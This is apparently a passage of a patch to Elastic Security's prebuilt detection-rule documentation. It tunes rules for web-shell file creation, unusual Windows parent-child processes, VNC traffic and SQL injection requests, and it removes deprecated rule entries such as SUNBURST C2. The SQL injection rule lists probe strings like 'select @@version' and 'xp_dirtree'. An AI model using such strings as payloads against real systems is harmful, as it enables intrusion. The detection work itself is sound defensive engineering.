+123,12 @@ file.path:( */dropins/* or */installedApps/* or /srv/caddy/* or /usr/local/openresty/* or */fileadmin/* or */custom_apps/* or */vhost* or /opt/apache-tomcat* or /opt/jetty* or /usr/local/jetty* or */wildfly*/* or */jboss*/* or */glassfish/* or */user_projects/domains/* or */resin*/webapps/* or */installedApps/* -) +) and +not ( + file.path:*/storage/framework/sessions/* or + (process.name:php-fpm* and file.path:(/mnt/WEB/*/public_html/tmp/templates/frontend/*.php or /mnt/WEB/*/public_html/wp-content/languages/*.json)) or + (process.name:node and (user.id>=1000 or user.id:0)) + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-parent-child-relationship.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-parent-child-relationship.asciidoc index b0c0968b51..987c06b8cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/unusual-parent-child-relationship.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unusual-parent-child-relationship.asciidoc @@ -48,7 +48,7 @@ Identifies Windows programs run from unexpected parent processes. This could ind * Data Source: SentinelOne * Data Source: Crowdstrike -*Version*: 323 +*Version*: 324 *Rule authors*: @@ -160,14 +160,14 @@ process.parent.name != null and process.parent.executable like ("?:\\*", "\\Devi (process.name:"SearchIndexer.exe" and not process.parent.name:"services.exe") or (process.name:"SearchProtocolHost.exe" and not process.parent.name:("SearchIndexer.exe", "dllhost.exe")) or (process.name:"dllhost.exe" and not process.parent.name:("services.exe", "svchost.exe")) or - (process.name:"smss.exe" and not process.parent.name:("System", "smss.exe")) or + (process.name:"smss.exe" and not process.parent.name:"System") or (process.name:"csrss.exe" and not process.parent.name:("smss.exe", "svchost.exe")) or (process.name:"wininit.exe" and not process.parent.name:"smss.exe") or (process.name:"winlogon.exe" and not process.parent.name:"smss.exe") or (process.name:("lsass.exe", "LsaIso.exe") and not process.parent.name:"wininit.exe") or (process.name:"LogonUI.exe" and not process.parent.name:("wininit.exe", "winlogon.exe")) or (process.name:"services.exe" and not process.parent.name:"wininit.exe") or - (process.name:"svchost.exe" and not process.parent.name:("MsMpEng.exe", "services.exe", "svchost.exe")) or + (process.name:"svchost.exe" and not process.parent.name:("MsMpEng.exe", "services.exe")) or (process.name:"spoolsv.exe" and not process.parent.name:("services.exe", "Workplace Starter.exe")) or (process.name:"taskhost.exe" and not process.parent.name:("services.exe", "svchost.exe", "ngentask.exe")) or (process.name:"taskhostw.exe" and not process.parent.name:("services.exe", "svchost.exe")) or @@ -176,11 +176,13 @@ process.parent.name != null and process.parent.executable like ("?:\\*", "\\Devi /* suspicious child processes */ (process.parent.name:("SearchProtocolHost.exe", "taskhost.exe", "csrss.exe") and not process.name:("werfault.exe", "wermgr.exe", "WerFaultSecure.exe", "conhost.exe", "ngentask.exe", "SearchProtocolHost.exe")) or (process.parent.name:"autochk.exe" and not process.name:("chkdsk.exe", "doskey.exe", "WerFault.exe")) or - (process.parent.name:"smss.exe" and not process.name:("autochk.exe", "smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "setupcl.exe", "WerFault.exe", "wpbbin.exe", "PvsVmBoot.exe", "SophosNA.exe", "omnissa-ic-nga.exe", "icarus_rvrt.exe", "poqexec.exe")) or - (process.parent.name:"wermgr.exe" and not process.name:("WerFaultSecure.exe", "wermgr.exe", "WerFault.exe") and + (process.parent.name:"smss.exe" and not process.name:("autochk.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "setupcl.exe", "WerFault.exe", "wpbbin.exe", "PvsVmBoot.exe", "SophosNA.exe", "omnissa-ic-nga.exe", "vmware-svi-nga.exe", "icarus_rvrt.exe", "poqexec.exe", "QcSkExt*.exe")) or + (process.parent.name:"wermgr.exe" and not process.name:("WerFaultSecure.exe", "WerFault.exe") and not (process.name:"rundll32.exe" and process.command_line : "*WerConCpl.dll*LaunchErcApp*")) or - (process.parent.name:"conhost.exe" and not process.name:("mscorsvw.exe", "wermgr.exe", "WerFault.exe", "WerFaultSecure.exe", "conhost.exe")) - ) + (process.parent.name:"conhost.exe" and not process.name:("mscorsvw.exe", "wermgr.exe", "WerFault.exe", "WerFaultSecure.exe")) + ) and + /* exclude self-spawns */ + not startswith~(process.parent.name, process.name) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-from-the-internet.asciidoc index 56e7aaec0c..656d362f65 100644 --- a/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-from-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-from-the-internet.asciidoc @@ -12,6 +12,7 @@ This rule detects network events that may indicate the use of VNC traffic from t * filebeat-* * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* *Severity*: high @@ -34,11 +35,12 @@ This rule detects network events that may indicate the use of VNC traffic from t * Tactic: Initial Access * Domain: Endpoint * Use Case: Threat Detection +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: pfSense * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -100,7 +102,7 @@ VNC allows remote control of systems, facilitating maintenance and resource shar [source, js] ---------------------------------- -(data_stream.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and not source.ip:( 10.0.0.0/8 or diff --git a/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-to-the-internet.asciidoc index 561ffa515e..b740d9b1ea 100644 --- a/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-to-the-internet.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/vnc-virtual-network-computing-to-the-internet.asciidoc @@ -12,6 +12,7 @@ This rule detects network events that may indicate the use of VNC traffic to the * filebeat-* * logs-network_traffic.* * logs-panw.panos* +* logs-fortinet_fortigate.log-* * logs-pfsense.log-* *Severity*: medium @@ -34,11 +35,12 @@ This rule detects network events that may indicate the use of VNC traffic to the * Tactic: Lateral Movement * Domain: Endpoint * Use Case: Threat Detection +* Data Source: Fortinet * Data Source: PAN-OS * Data Source: pfSense * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -101,7 +103,7 @@ VNC is a tool that allows remote control of computers, often used by administrat [source, js] ---------------------------------- -(data_stream.dataset: network_traffic.flow or (event.category: (network or network_traffic))) and +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and source.ip:( 10.0.0.0/8 or diff --git a/docs/detections/prebuilt-rules/rule-details/web-server-potential-sql-injection-request.asciidoc b/docs/detections/prebuilt-rules/rule-details/web-server-potential-sql-injection-request.asciidoc index 11fd6e6438..dba1be9087 100644 --- a/docs/detections/prebuilt-rules/rule-details/web-server-potential-sql-injection-request.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/web-server-potential-sql-injection-request.asciidoc @@ -44,7 +44,7 @@ This rule detects potential SQL injection attempts in web server requests by ide * Data Source: Zeek * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -178,6 +178,11 @@ url.original like~ ( "*select @@version*", "*select user()*", "*select current_user()*", "*select database()*", "*sp_executesql*exec*", "*xp_dirtree*" ) +) and +not user_agent.original like~ ( + "*Nessus*", "*Qualys*", "*Acunetix*", "*Tenable*", "*CensysInspect*", "*Detectify*", + "*Assetnote*", "*ExposureScan*", "*RecordedFuture*", "*AppSpider*", "*WebInspect*", + "*Rapid7*", "*InsightVM*", "*Probely*" ) ---------------------------------- diff --git a/docs/index.asciidoc b/docs/index.asciidoc index d5f3bbbbf6..d40b0a4ff4 100644 --- a/docs/index.asciidoc +++ b/docs/index.asciidoc @@ -145,3 +145,5 @@ include::detections/prebuilt-rules/downloadable-packages/8-19-29/prebuilt-rules- include::detections/prebuilt-rules/downloadable-packages/8-19-30/prebuilt-rules-8-19-30-appendix.asciidoc[] include::detections/prebuilt-rules/downloadable-packages/8-19-31/prebuilt-rules-8-19-31-appendix.asciidoc[] + +include::detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc[] From 52110bb772aa96fc1cdffef2eae03f99c7585e02 Mon Sep 17 00:00:00 2001 From: Shashank K S Date: Tue, 1 Sep 2026 19:33:20 +0530 Subject: [PATCH 2/2] Remove deprecated rule references --- .../prebuilt-rules-8-19-32-appendix.asciidoc | 10 ---------- .../prebuilt-rules-8-19-32-summary.asciidoc | 20 ------------------- 2 files changed, 30 deletions(-) diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc index bfb14c9b16..761e53dcbe 100644 --- a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-appendix.asciidoc @@ -122,13 +122,3 @@ include::prebuilt-rule-8-19-32-potential-timestomp-in-executable-files.asciidoc[ include::prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc[] include::prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc[] include::prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-sunburst-command-and-control-activity.asciidoc[] -include::prebuilt-rule-8-19-32-gke-service-account-token-created-via-tokenrequest-api.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-encoded-executable-stored-in-the-registry.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-potential-powershell-obfuscated-script.asciidoc[] -include::prebuilt-rule-8-19-32-kubernetes-denied-service-account-request-via-unusual-user-agent.asciidoc[] -include::prebuilt-rule-8-19-32-kubernetes-unusual-decision-by-user-agent.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-m365-security-compliance-email-reported-by-user-as-malware-or-phish.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-adobe-hijack-persistence.asciidoc[] -include::prebuilt-rule-8-19-32-mfa-disabled-for-google-workspace-organization.asciidoc[] -include::prebuilt-rule-8-19-32-deprecated-suspicious-printspooler-service-executable-file-creation.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc index 95a2320331..3207a91d47 100644 --- a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rules-8-19-32-summary.asciidoc @@ -245,24 +245,4 @@ This section lists all updates associated with version 8.19.32 of the Fleet inte |<> | Identifies the creation of ASPX/ASHX/ASMX files in specific directories that are commonly targeted by attackers to deploy web shells. | update | 5 -|<> | The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor. | deprecated | 113 - -|<> | Detects creation of a GKE service account token through the TokenRequest API by a non-system identity. TokenRequest allows programmatic minting of short-lived tokens for any service account the caller can create tokens for, without reading a mounted projected token from disk. Attackers with initial cluster access can abuse this API to obtain tokens for more privileged service accounts, pivot via Workload Identity to GCP APIs, or retain access after pod termination. Unlike filesystem token theft, TokenRequest activity is visible only in Kubernetes audit logs as create against the serviceaccounts/token subresource. | deprecated | 2 - -|<> | Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk. | deprecated | 420 - -|<> | Identifies scripts that contain patterns and known methods that obfuscate PowerShell code. Attackers can use obfuscation techniques to bypass PowerShell security protections such as Antimalware Scan Interface (AMSI). | deprecated | 111 - -|<> | This rule detects when a service account makes an unauthorized request for resources from the API server via an unusual user agent. Service accounts follow a very predictable pattern of behavior. A service account should never send an unauthorized request to the API server. This behavior is likely an indicator of compromise or of a problem within the cluster. An adversary may have gained access to credentials/tokens and this could be an attempt to access or create resources to facilitate further movement or execution within the cluster. | deprecated | 13 - -|<> | This rule detects unusual request responses in Kubernetes audit logs through the use of the "new_terms" rule type. In production environments, default API requests are typically made by system components or trusted users, who are expected to have a consistent user agent and allowed response annotations. By monitoring for anomalies in the username and response annotations, this rule helps identify potential unauthorized access or misconfigurations in the Kubernetes environment. | deprecated | 7 - -|<> | Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. | deprecated | 214 - -|<> | Detects writing executable files that will be automatically launched by Adobe on launch. | deprecated | 422 - -|<> | Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization’s security controls. | deprecated | 213 - -|<> | Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched. | deprecated | 324 - |==============================================